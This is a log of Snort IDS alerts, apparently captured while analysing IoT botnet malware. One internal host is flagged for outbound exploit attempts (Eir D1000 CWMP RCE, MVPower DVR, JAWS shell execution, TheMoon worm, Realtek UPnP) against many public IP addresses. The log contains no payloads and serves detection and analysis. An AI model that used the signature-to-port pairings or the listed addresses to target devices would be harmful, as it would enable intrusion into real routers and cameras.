Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47702 -> 163.182.121.40:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41252 -> 86.178.198.25:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41864 -> 121.133.186.128:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54080 -> 86.133.48.241:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:51540 -> 4.194.103.75:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36712 -> 124.218.48.114:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33070 -> 128.199.249.92:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53918 -> 31.52.24.150:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49504 -> 86.144.50.78:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41868 -> 14.85.144.61:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33510 -> 78.166.28.66:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:42894 -> 23.219.40.85:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53930 -> 31.52.24.150:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48016 -> 83.143.132.22:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57358 -> 24.209.204.179:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54920 -> 98.173.248.59:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52506 -> 2.19.201.24:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:33522 -> 78.166.28.66:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39664 -> 124.87.30.108:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52506 -> 2.19.201.24:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:58586 -> 137.184.115.152:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55476 -> 34.107.234.170:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:57904 -> 199.232.189.40:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53010 -> 176.56.242.49:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:55704 -> 34.107.234.170:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49352 -> 72.27.193.199:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47724 -> 163.182.121.40:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34846 -> 170.249.13.75:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49420 -> 72.27.193.199:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50142 -> 172.67.211.32:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47554 -> 122.117.127.10:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44832 -> 179.155.26.219:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53246 -> 176.56.242.49:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34850 -> 170.249.13.75:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45710 -> 186.223.127.222:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45726 -> 186.223.127.222:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:53616 -> 144.196.230.79:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58370 -> 179.235.85.170:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:52898 -> 102.223.127.78:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45092 -> 179.155.26.219:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:51670 -> 77.240.115.67:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58330 -> 99.243.200.180:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:52514 -> 34.236.132.177:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58342 -> 99.243.200.180:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:35160 -> 134.122.189.189:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44484 -> 14.88.152.52:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:52262 -> 46.148.230.114:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48658 -> 172.65.156.227:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44494 -> 14.88.152.52:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48192 -> 172.65.52.251:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:32788 -> 172.105.76.123:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47588 -> 44.202.167.15:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:55390 -> 172.88.86.134:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:39946 -> 18.245.75.170:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36800 -> 172.67.130.105:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54576 -> 172.67.213.76:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35648 -> 172.66.200.221:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40822 -> 172.67.18.44:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44242 -> 184.94.139.193:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43630 -> 54.236.148.44:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37622 -> 34.225.83.253:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33696 -> 148.72.72.45:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34490 -> 4.208.29.15:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36400 -> 104.17.102.138:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43630 -> 54.236.148.44:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37622 -> 34.225.83.253:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36400 -> 104.17.102.138:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54494 -> 150.95.159.115:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33696 -> 148.72.72.45:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34490 -> 4.208.29.15:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42270 -> 23.192.181.204:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42340 -> 101.62.198.198:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32808 -> 79.221.242.146:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43248 -> 23.52.77.91:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42340 -> 101.62.198.198:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32808 -> 79.221.242.146:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47700 -> 212.33.198.66:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54494 -> 150.95.159.115:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43248 -> 23.52.77.91:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43714 -> 38.57.128.187:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42270 -> 23.192.181.204:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47700 -> 212.33.198.66:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43714 -> 38.57.128.187:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58608 -> 179.235.85.170:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59512 -> 177.82.33.187:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56140 -> 14.76.244.211:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48880 -> 115.7.75.39:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60680 -> 107.178.243.68:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57078 -> 172.65.227.33:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48786 -> 172.67.167.241:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36016 -> 172.66.162.167:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:40948 -> 68.114.230.38:7547
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52362 -> 184.183.79.73:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:60724 -> 107.178.243.68:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:57098 -> 72.228.173.126:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58670 -> 179.235.85.170:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44132 -> 38.91.50.181:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59548 -> 177.82.33.187:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:40996 -> 68.114.230.38:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44140 -> 38.91.50.181:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56182 -> 14.76.244.211:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:48926 -> 115.7.75.39:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46296 -> 211.226.82.70:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46756 -> 115.11.193.212:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46308 -> 211.226.82.70:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:46772 -> 115.11.193.212:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53562 -> 75.174.90.129:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:57700 -> 23.243.23.183:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:40410 -> 177.69.78.135:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:40996 -> 183.127.209.150:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53640 -> 75.174.90.129:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58602 -> 14.81.222.9:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59468 -> 71.222.9.43:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59518 -> 71.222.9.43:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47126 -> 64.225.3.109:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53524 -> 93.99.127.188:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47126 -> 64.225.3.109:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47782 -> 94.45.87.85:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57886 -> 119.197.148.29:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:58636 -> 14.81.222.9:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:42040 -> 175.228.156.82:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34520 -> 171.33.128.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53524 -> 93.99.127.188:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47858 -> 94.45.87.85:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:43940 -> 99.252.167.53:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56690 -> 5.77.20.225:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59394 -> 121.74.80.205:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34520 -> 171.33.128.234:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57886 -> 119.197.148.29:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:43964 -> 99.252.167.53:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:42124 -> 175.228.156.82:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56728 -> 5.77.20.225:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:59436 -> 121.74.80.205:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36432 -> 71.32.167.11:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49438 -> 47.201.29.32:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36586 -> 129.208.149.252:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36684 -> 129.208.149.252:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36612 -> 82.9.9.253:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44186 -> 105.98.181.140:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34564 -> 191.13.51.79:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36618 -> 82.9.9.253:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:56822 -> 52.42.65.252:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52222 -> 172.67.9.103:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53972 -> 172.67.231.196:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43036 -> 172.191.44.199:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44196 -> 105.98.181.140:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:34580 -> 191.13.51.79:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:55880 -> 78.189.162.9:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:58574 -> 184.175.24.136:8080
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:49536 -> 47.201.29.32:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:36530 -> 71.32.167.11:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60912 -> 104.104.180.253:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57062 -> 172.66.145.7:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46494 -> 172.93.133.108:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48492 -> 98.175.15.109:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49218 -> 34.200.196.158:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33448 -> 172.65.196.141:8080
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60026 -> 172.65.75.150:8080
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60230 -> 47.254.206.108:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:39198 -> 221.151.229.215:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54086 -> 154.93.187.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60230 -> 47.254.206.108:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43596 -> 34.198.169.148:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42848 -> 104.129.40.240:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43596 -> 34.198.169.148:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44490 -> 14.60.45.123:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:39226 -> 221.151.229.215:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43748 -> 45.235.186.141:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42848 -> 104.129.40.240:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54086 -> 154.93.187.141:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49100 -> 184.30.178.74:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49206 -> 95.101.245.165:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:44510 -> 14.60.45.123:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43748 -> 45.235.186.141:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:52644 -> 13.32.230.107:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50202 -> 76.223.3.151:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:34080 -> 108.138.161.56:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:42248 -> 82.156.57.233:80
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60632 -> 210.123.46.213:52869
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53206 -> 74.71.54.66:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:36958 -> 217.103.174.233:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37686 -> 99.253.49.92:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41060 -> 67.6.90.92:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:53298 -> 74.71.54.66:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:44230 -> 37.130.81.195:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37780 -> 99.253.49.92:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38134 -> 86.152.237.167:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:37064 -> 217.103.174.233:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51548 -> 184.24.62.8:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47132 -> 121.75.140.67:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:41154 -> 67.6.90.92:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51548 -> 184.24.62.8:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:38148 -> 86.152.237.167:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53854 -> 46.101.125.102:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45204 -> 175.225.88.98:7547
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:37186 -> 111.202.53.185:7547
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:58962 -> 91.92.231.22:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39872 -> 211.228.200.196:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:47236 -> 121.75.140.67:7547
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52904 -> 119.206.182.2:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58466 -> 103.19.250.149:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53854 -> 46.101.125.102:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:45224 -> 175.225.88.98:7547
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39872 -> 211.228.200.196:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36394 -> 136.0.97.153:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58466 -> 103.19.250.149:80
Source: Traffic	Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40290 -> 184.151.192.120:8080
